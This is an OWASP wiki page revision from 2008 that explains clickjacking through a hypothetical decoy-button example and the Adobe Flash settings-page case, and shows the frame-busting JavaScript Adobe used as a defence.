Clickjacking

From OWASP
Revision as of 18:02, 27 December 2008 by JerryH (Talk | contribs)

Jump to: navigation, search

Clickjacking, also known as a UI Redress Attack, is when an attacker uses multiple (often transparent) layers so when a user clicks on an area of the web page, they are inadvertently clicking on a button or link on another page.

For example, imagine an attacker who builds a web site that has a button on it that says "click here for a free iPod". However, on top of that web page, the attacker has loaded in a iframe your mail account, and lined up exactly the "delete all messages" button directly on top of the "free iPod" button. The victim tries to click on the "free iPod" button but instead actually clicked on the invisible "delete all messages" button. In essence, the attacker has "hijacked" the user's click, hence the name "Clickjacking".

Using the same technique, keystrokes could also be hijacked, so a user believes they are typing in their password to their email or their bank account, but in reality they are typing into an invisible frame, possibly controlled by the attacker.

One of the most notorious examples of Clickjacking was an attack against the Adobe Flash plugin settings page:

http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager06.html

By loading this page into an invisible iframe, an attacker could trick a user into altering the security settings of Flash, giving permission for any Flash animation to utilize the computer's microphone and camera.

To prevent this from happening, Adobe added the following code to the web page:

 if (top!=self){
       top.location.href=self.location.href;
 }


This code ensures the page cannot be embedded into an iframe, and therefore cannot be used as part of a clickjacking attack.